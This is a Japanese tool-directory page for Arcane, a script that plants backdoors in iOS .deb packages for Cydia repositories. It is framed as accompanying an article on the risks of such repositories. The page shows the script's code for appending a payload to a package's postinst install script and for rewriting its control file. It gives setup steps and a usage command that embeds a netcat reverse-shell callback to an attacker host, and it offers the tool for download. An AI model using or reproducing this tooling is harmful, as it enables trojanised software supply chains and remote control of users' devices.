Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Arcane — Arcaneは、iOSパッケージ(iphone-arm)にバックドアを仕込み、APTリポジトリに必要なリソースを作成するために設計されたシンプルなスクリプトです。 | Kitploit
ツール/GitHubGitHub/tokyoneon/arcane
iOSセキュリティポストエクスプロイトモバイルセキュリティサプライチェーンセキュリティ学習と教育ペイロード開発
GitHubtokyoneon/arcane

Arcane

Arcaneは、iOSパッケージ(iphone-arm)にバックドアを仕込み、APTリポジトリに必要なリソースを作成するために設計されたシンプルなスクリプトです。

リポジトリを見る
1572976年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Arcaneは、iOSパッケージ(iphone-arm)にバックドアを仕掛け、APTリポジトリに必要なリソースを作成するためのシンプルなスクリプトです。このスクリプトは、この記事のために作成され、Cydiaリポジトリがなぜ危険であるか、そして侵害されたiOSデバイスからどのようなポストエクスプロイト攻撃が可能かを説明するのに役立ちます。


Arcaneの仕組み...

GIFで何が起こっているかを理解するには、Arcaneで作成されたパッケージを解凍します。

root@kitploit:~
dpkg-deb -R /tmp/cydia/whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb /tmp/whois-decomp

DEBIANディレクトリ内のcontrolファイルとpostinstファイルに注目してください。どちらのファイルも重要です。

root@kitploit:~
tree /tmp/whois-decomp/

/tmp/whois-decomp/
├── DEBIAN
│   ├── control
│   └── postinst
└── usr
    └── bin
        └── whois

アプリケーションのインストールや削除時に、パッケージの一部としてスクリプトを提供することが可能です。パッケージメンテナスクリプトには、preinst、postinst、prerm、postrmファイルが含まれます。Arcaneは、インストール中にコマンドを実行するためにpostinstファイルを悪用します。

root@kitploit:~
# The "post-installation" file. This file is generally responsible
# for executing commands on the OS after installing the required
# files. It's utilized by developers to manage and maintain various
# aspects of an installation. Arcane abuses this functionality by
# appending malicious Bash commands to the file.
postinst="$tmp/DEBIAN/postinst";

# A function to handle the type of command execution embedded into the
# postinst file.
function inject_backdoor ()
{
    # If --file is used, `cat` the command(s) into the postinst file.
    if [[ "$infile" ]]; then
        cat "$infile" >> "$postinst";
        embed="[$infile]";
    else
        # If no --file, utilize the simple Bash payload, previously
        # defined.
        echo -e "$payload" >> "$postinst";
        embed="generic shell command";
    fi;
    status "embedded $embed into postinst" "error embedding backdoor";
    chmod 0755 "$postinst"
};

controlファイルには、パッケージ管理ツールがパッケージをインストールする際に使用する値が含まれています。Arcaneは、既存のcontrolを変更するか、新しく作成します。

root@kitploit:~
# The "control" file template. Most iOS packages will include a
# control file. In the event one is not found, Arcane will use the
# below template. The `$hacker` variable is used here to occupy
# various arbitrary fields.
# https://www.debian.org/doc/manuals/maint-guide/dreq.en.html
controlTemp="Package: com.$hacker.backdoor
Name: $hacker backdoor
Version: 1337
Section: app
Architecture: iphoneos-arm
Description: A backdoored iOS package
Author: $hacker <https://$hacker.github.io/>
Maintainer: $hacker <https://$hacker.github.io/>";

...

# An `if` statement to check for the control file.
if [[ ! -f "$tmp/DEBIAN/control" ]]; then
    # If no control is detected, create it using the template.
    echo "$controlTemp" > "$tmp/DEBIAN/control";
    status "created control file" "error with control template";
else
    # If a control file exists, Arcane will simply rename the package
    # as it appears in the list of available Cydia applications. This
    # makes the package easier to location in Cydia.
    msg "detected control file" succ;
    sed -i '0,/^Name:.*/s//Name: $hacker backdoor/' "$tmp/DEBIAN/control";
    status "modified control file" "error with control";
fi;

使用方法

Kali v2020.3でリポジトリをクローンします。

root@kitploit:~
sudo apt-get update; sudo apt-get install -Vy bzip2 netcat-traditional dpkg coreutils # dependencies
sudo git clone https://github.com/tokyoneon/arcane /opt/arcane
sudo chown $USER:$USER -R /opt/arcane/; cd /opt/arcane
chmod +x arcane.sh;./arcane.sh --help

指定されたパッケージにコマンドを埋め込みます。詳細は記事を参照してください。

root@kitploit:~
./arcane.sh --input samples/sed_4.5-1_iphoneos-arm.deb --lhost <attacker> --lport <4444> --cydia --netcat

パッケージサンプル

リポジトリにはテスト用のパッケージが含まれています。

root@kitploit:~
ls -la samples/

-rw-r--r-- 1 root root 100748 Jul 17 18:39 libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb
-rw-r--r-- 1 root root 142520 Jul 22 06:21 network-cmds_543-1_iphoneos-arm.deb
-rw-r--r-- 1 root root  76688 Aug 29  2018 sed_4.5-1_iphoneos-arm.deb
-rw-r--r-- 1 root root  60866 Jul  8 21:03 top_39-2_iphoneos-arm.deb
-rw-r--r-- 1 root root  13810 Aug 29  2018 whois_5.3.2-1_iphoneos-arm.deb

公式のBingnerリポジトリにあるMD5チェックサム。

root@kitploit:~
md5sum samples/*.deb

3f1712964701580b3f018305a55e217c  samples/libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb
795ccf9c6d53dd60d2f74f7a601f474f  samples/network-cmds_543-1_iphoneos-arm.deb
a020882dac121afa4b03c63304d729b0  samples/sed_4.5-1_iphoneos-arm.deb
38db275007a331e7ff8899ea22261dc7  samples/top_39-2_iphoneos-arm.deb
b40ee800b72bbac323568b36ad67bb16  samples/whois_5.3.2-1_iphoneos-arm.deb
ツールをダウンロード